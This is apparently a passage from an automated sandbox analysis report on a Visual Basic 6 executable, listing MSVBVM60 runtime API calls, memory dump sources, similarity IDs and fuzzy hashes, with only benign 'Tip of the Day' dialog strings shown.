                  • __vbaStrMove.MSVBVM60( file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC26
                  • __vbaStrCat.MSVBVM60(0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC32
                  • __vbaStrMove.MSVBVM60(0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC3C
                  • __vbaStrCat.MSVBVM60(0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC43
                  • __vbaStrMove.MSVBVM60(0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC4D
                  • __vbaStrCat.MSVBVM60(Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC58
                  • __vbaStrMove.MSVBVM60(Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC62
                  • __vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC69
                  • __vbaStrMove.MSVBVM60(TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC73
                  • __vbaStrCat.MSVBVM60( using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC7E
                  • __vbaStrMove.MSVBVM60( using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ,?,00000000), ref: 004FEC88
                  • __vbaStrCat.MSVBVM60(Then place it in the same directory as the application. ,00000000, using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ), ref: 004FEC93
                  • __vbaStrMove.MSVBVM60(Then place it in the same directory as the application. ,00000000, using NotePad with 1 tip per line. ,00000000,TIPOFDAY.TXT,00000000,Create a text file named ,00000000,0040CD00,00000000,0040CD00,00000000, file was not found? ,00000000,TIPOFDAY.TXT,That the ), ref: 004FEC9D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CE08,00000054), ref: 004FECBA
                  • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 004FECE1
                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,?,0040CE08,00000054), ref: 004FECEC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Move$CheckFreeHresult$ListNew2$#594#689Addref
                  • String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$TIPOFDAY.TXT$That the $Then place it in the same directory as the application.
                  • API String ID: 1089064309-206723237
                  • Opcode ID: 883fe2a7b846041538374f6b38acfb74f096eaae437b42eb5eb8f2847a28bb15
                  • Instruction ID: 13b58d9a19421793fd7212617565c22be8a719070ab75131cc42dff294c54b91
                  • Opcode Fuzzy Hash: 883fe2a7b846041538374f6b38acfb74f096eaae437b42eb5eb8f2847a28bb15
                  • Instruction Fuzzy Hash: 37B14471D40208BBCB04EBA5DC85EEE77BDAF18704F14413BF615BB1E1DA7859058BA8
                  APIs
                  • __vbaVarVargNofree.MSVBVM60(0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1E0
                  • __vbaStrVarCopy.MSVBVM60(00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1E6
                  • __vbaStrMove.MSVBVM60(00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC1F0
                  • __vbaNew2.MSVBVM60(00409904,?,00000000,0040BEAC,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004FC215
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,0000001C,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC237
                  • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC24D
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 004FC25F
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC279
                  • __vbaNew2.MSVBVM60(00409904,?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC298
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,0000001C,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC2B5
                  • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC2C5
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 004FC2D7
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 004FC2F1
                  • __vbaNew2.MSVBVM60(00409904,?,00000000,00000000,?,?,00000018,00000008), ref: 004FC310
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,00000020,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC32D
                  • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004FC33C
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 004FC34E
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC368
                  • __vbaNew2.MSVBVM60(00409904,?,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC383
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BDB8,00000020,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3A0
                  • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3B0
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 004FC3C2
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008,?,?,?,00000000,00000000,?), ref: 004FC3DC
                  • __vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC400
                  • __vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC409
                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC416
                  • __vbaSetSystemError.MSVBVM60(00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC424
                  • __vbaStrToUnicode.MSVBVM60(?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018), ref: 004FC430
                  • __vbaFreeStr.MSVBVM60(?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018), ref: 004FC438
                  • __vbaSetSystemError.MSVBVM60(?,00006610,00401006,00000000,004FB9CC,?,?,00401006,00000000,?,?,00000000,?,00000000,?,00008003), ref: 004FC452
                  • __vbaAryLock.MSVBVM60(?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?,00401006,00000000,?,?,00000000,?,00000000), ref: 004FC460
                  • __vbaSetSystemError.MSVBVM60(004FB9CC,00000000,00000001,00000000,?,?,?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?,00401006), ref: 004FC47F
                  • __vbaAryUnlock.MSVBVM60(?,004FB9CC,00000000,00000001,00000000,?,?,?,000000FF,?,00006610,00401006,00000000,004FB9CC,?,?), ref: 004FC488
                  • __vbaRedimPreserve.MSVBVM60(00000080,00000001,000000FF,00000011,00000001,?,00000000,?,004FB9CC,00000000,00000001,00000000,?,?,?,000000FF), ref: 004FC49F
                  • __vbaFreeObj.MSVBVM60(004FC4DF,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC4D1
                  • __vbaFreeStr.MSVBVM60(004FC4DF,?,00000000,?,00008003,00000000,00000000,00401006,?,00000018,00000000), ref: 004FC4D9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
                  • String ID:
                  • API String ID: 1703787653-0
                  • Opcode ID: 53b1819d0daf4a6dea98ac09c1f07ea0d32592184725d96cba7041c397b738d9
                  • Instruction ID: fe4f05bb9b394a2db23a9c91b1b7239e9f06f28171879672cc90585fd6296c92
                  • Opcode Fuzzy Hash: 53b1819d0daf4a6dea98ac09c1f07ea0d32592184725d96cba7041c397b738d9
                  • Instruction Fuzzy Hash: 77A11C71D4021DBADF14EBE5C986EEF7B7DEF08744F10412BF201B6192D67899048BA4
                  APIs
                    • Part of subcall function 004FAC80: __vbaRedim.MSVBVM60(00000080,00000001,00503210,00000011,00000001,0000003F,00000000), ref: 004FACC0
                  • __vbaFreeVar.MSVBVM60(?), ref: 004FAD41
                  • #644.MSVBVM60(00000000,?), ref: 004FAD47
                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 004FAD54
                  • __vbaStrCat.MSVBVM60(0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD67
                  • __vbaStrMove.MSVBVM60(0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD71
                  • __vbaStrCat.MSVBVM60(0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD7D
                  • __vbaStrMove.MSVBVM60(0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD87
                  • __vbaStrCat.MSVBVM60(0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD92
                  • __vbaStrMove.MSVBVM60(0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FAD9C
                  • __vbaI4Str.MSVBVM60(00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADA2
                  • __vbaStrCat.MSVBVM60(0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADAE
                  • __vbaStrMove.MSVBVM60(0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADB8
                  • __vbaI4Str.MSVBVM60(00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000,?), ref: 004FADBE
                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000,0040BE84,0040BE7C,?,00000000,00000000), ref: 004FADCA
                  • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000,00000000,0040BE74,0040BE6C,00000000,00000000,0040BE8C,00000000,0040BE74,00000000), ref: 004FADE1
                  • __vbaAryLock.MSVBVM60(?,00000000,?), ref: 004FADF3
                  • #644.MSVBVM60(?,?,00000000,?), ref: 004FAE02
                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,?), ref: 004FAE0D
                  • __vbaSetSystemError.MSVBVM60(00000000,00000040,?,?,00000000,00000000,00000040,?,?,?,00000000,?), ref: 004FAE2A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Move$ErrorSystem$#644Free$ListLockRedimUnlock
                  • String ID: 0"P
                  • API String ID: 1842092487-401812310
                  • Opcode ID: 5ab3e4ee78c146433b897b9cb61ac562b7d911ef4f6963e78108b819a6993c1f
                  • Instruction ID: e692b728713c86e643894548c8e8ec123637982edfcaaf1a233d7e848f328fa7
                  • Opcode Fuzzy Hash: 5ab3e4ee78c146433b897b9cb61ac562b7d911ef4f6963e78108b819a6993c1f
                  • Instruction Fuzzy Hash: E131ECB1D001186ACB05EBA5C846EEF767CEF19704B14412BF611B62A1DB7C99058BB9
                  APIs
                  • __vbaObjSetAddref.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FD4E6
                  • __vbaVarMove.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FD504
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD52D
                  • __vbaVarCmpGt.MSVBVM60(?,005032C0,00000002,?), ref: 004FD568
                  • __vbaVarOr.MSVBVM60(?,00000000,?,005032C0,00000002,?), ref: 004FD572
                  • __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD578
                  • __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD583
                  • __vbaRedim.MSVBVM60(00000080,00000001,00503220,00000011,00000001,?,00000000,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD5A8
                  • __vbaAryLock.MSVBVM60(?,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD5BA
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FD5EA
                  • __vbaAryUnlock.MSVBVM60(?), ref: 004FD5F3
                  • __vbaVarMove.MSVBVM60(?,00008003,?), ref: 004FD615
                  • __vbaFreeObj.MSVBVM60(004FD654,00000000,?,00000000,?,005032C0,00000002,?), ref: 004FD64E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$CheckFreeHresultMove$AddrefBoolLockNullRedimUnlock
                  • String ID: #P$ 2P
                  • API String ID: 3528959866-2063345085
                  • Opcode ID: 49f5fba25593cb0acfe93c30554703775e444846d4d88b77dc70e4809935b2dd
                  • Instruction ID: 1bbc5ab86efad46ade1bb089d2f8663394e10a035afc9b0f337b20a49f65ce71
                  • Opcode Fuzzy Hash: 49f5fba25593cb0acfe93c30554703775e444846d4d88b77dc70e4809935b2dd
                  • Instruction Fuzzy Hash: 6B41D8B1D00218AFDB14EFA9CC85EDEBBBDFB08704F50451AF105BB291D77999058BA4
                  APIs
                  • #648.MSVBVM60(?), ref: 004FE4FA
                  • __vbaFreeVar.MSVBVM60(?), ref: 004FE505
                  • __vbaStrCmp.MSVBVM60(0040BEA8,?,?), ref: 004FE514
                  • #645.MSVBVM60(?,00000000,0040BEA8,?,?), ref: 004FE537
                  • __vbaStrMove.MSVBVM60(?,00000000,0040BEA8,?,?), ref: 004FE541
                  • __vbaStrCmp.MSVBVM60(0040BEA8,00000000,?,00000000,0040BEA8,?,?), ref: 004FE54C
                  • __vbaFreeStr.MSVBVM60(0040BEA8,00000000,?,00000000,0040BEA8,?,?), ref: 004FE55D
                  • __vbaFreeStr.MSVBVM60(004FE65F), ref: 004FE659
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$#645#648Move
                  • String ID:
                  • API String ID: 2957232524-0
                  • Opcode ID: a7502cbc32c6a79cd6317df831b075d8a7f199f4c751809c12f771afed83068c
                  • Instruction ID: 23e628260fb18d390f68e270c91f65b88435ab54121a8c4d2dc4c4a7f9ca9f62
                  • Opcode Fuzzy Hash: a7502cbc32c6a79cd6317df831b075d8a7f199f4c751809c12f771afed83068c
                  • Instruction Fuzzy Hash: 35512B71D01218AFCB00EFD6C941AEEBBB8AF18704F50412BF615BB2A1D7785A05CF99
                  APIs
                  • __vbaNew2.MSVBVM60(0040C9C4,00503BA8), ref: 004FE6E9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000014), ref: 004FE70D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC50,00000058), ref: 004FE730
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004FE743
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CCA4,000000E0), ref: 004FE769
                  • __vbaStrI2.MSVBVM60(?), ref: 004FE771
                  • __vbaStrMove.MSVBVM60(?), ref: 004FE77B
                  • #690.MSVBVM60(?,Options,Show Tips at Startup,00000000,?), ref: 004FE78E
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 004FE79D
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000002,?,?,?,Options,Show Tips at Startup,00000000,?), ref: 004FE7AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$CheckHresult$FreeList$#690MoveNew2
                  • String ID: Options$Show Tips at Startup
                  • API String ID: 2513475975-2759323971
                  • Opcode ID: 3bc3b852b7dfa3f6813dfd766fadbfd9fcebd51df7b21294debb407c5e773a88
                  • Instruction ID: 8a94f54eaa591aeb037a0b52cb3b76dbf075d533dc688a2e57e8bf33735e65a4
                  • Opcode Fuzzy Hash: 3bc3b852b7dfa3f6813dfd766fadbfd9fcebd51df7b21294debb407c5e773a88
                  • Instruction Fuzzy Hash: 6C313F71940208BFDB00EF95CD86EEEBBB8AF18709F10417AF605F71E1D67899448BA4
                  APIs
                  • __vbaNew2.MSVBVM60(0040CC40,?), ref: 004FEDAC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CC30,00000024), ref: 004FEDCC
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004FEDE9
                  • __vbaNew2.MSVBVM60(0040CC40,?,?,00000000), ref: 004FEDFB
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040CC30,0000001C), ref: 004FEE2C
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 004FEE3B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040CE08,00000054), ref: 004FEE54
                  • __vbaFreeStr.MSVBVM60 ref: 004FEE5C
                  • __vbaFreeObj.MSVBVM60 ref: 004FEE64
                  • __vbaFreeVar.MSVBVM60 ref: 004FEE6C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$CheckFreeHresult$New2
                  • String ID: #P$#P
                  • API String ID: 4034668929-643604421
                  • Opcode ID: ad6a19147125da6a79a55770fbc7dcefec8657f31b3b42ad2c4b01f5ac509ab4
                  • Instruction ID: 5af4ddff2a76c9196be9ace13cc238c468b16e20f714446619fca71fef557af4
                  • Opcode Fuzzy Hash: ad6a19147125da6a79a55770fbc7dcefec8657f31b3b42ad2c4b01f5ac509ab4
                  • Instruction Fuzzy Hash: 91313E71900209EBDB14AFA6C985EAFBBBCFF18705F10402FF615B71A1D77899048AA4
                  APIs
                  • __vbaStrCopy.MSVBVM60(00000000,00503300,00004008), ref: 004F9D8F
                    • Part of subcall function 004F9EF4: __vbaVarVargNofree.MSVBVM60 ref: 004F9F36
                    • Part of subcall function 004F9EF4: __vbaLenVar.MSVBVM60(?,00000000), ref: 004F9F40
                    • Part of subcall function 004F9EF4: __vbaVarMove.MSVBVM60(?,00000000), ref: 004F9F4A
                  • __vbaVarSub.MSVBVM60(?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DCE
                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DD4
                  • __vbaRedim.MSVBVM60(00000080,00000001,00503218,00000011,00000001,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9DE8
                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DF3
                  • __vbaStr2Vec.MSVBVM60(?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DFF
                  • __vbaAryMove.MSVBVM60(?,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9E0C
                  • __vbaVarSub.MSVBVM60(?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9E44
                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E4A
                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E54
                  • __vbaVarCopy.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E8B
                  • __vbaFreeStr.MSVBVM60(004F9ED7,00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?), ref: 004F9EC6
                  • __vbaAryDestruct.MSVBVM60(00000000,?,004F9ED7,00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?), ref: 004F9ED1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$CopyMove$DestructNofreeRedimStr2Varg
                  • String ID:
                  • API String ID: 303438936-0
                  • Opcode ID: 4e5380356bfeeb3c971159fd50d9e8f42f2393d1b63b2634f44d0d9e2bc86935
                  • Instruction ID: c39a5234130bc96bc66ac869b02215cd2b81ea9cfcb5dd8006d3c104e3b278b8
                  • Opcode Fuzzy Hash: 4e5380356bfeeb3c971159fd50d9e8f42f2393d1b63b2634f44d0d9e2bc86935
                  • Instruction Fuzzy Hash: B141C6B1C0025CAACB11EFE5C9859DEBBBCBB48704F20412FE615B7292D7785A05CFA4
                  APIs
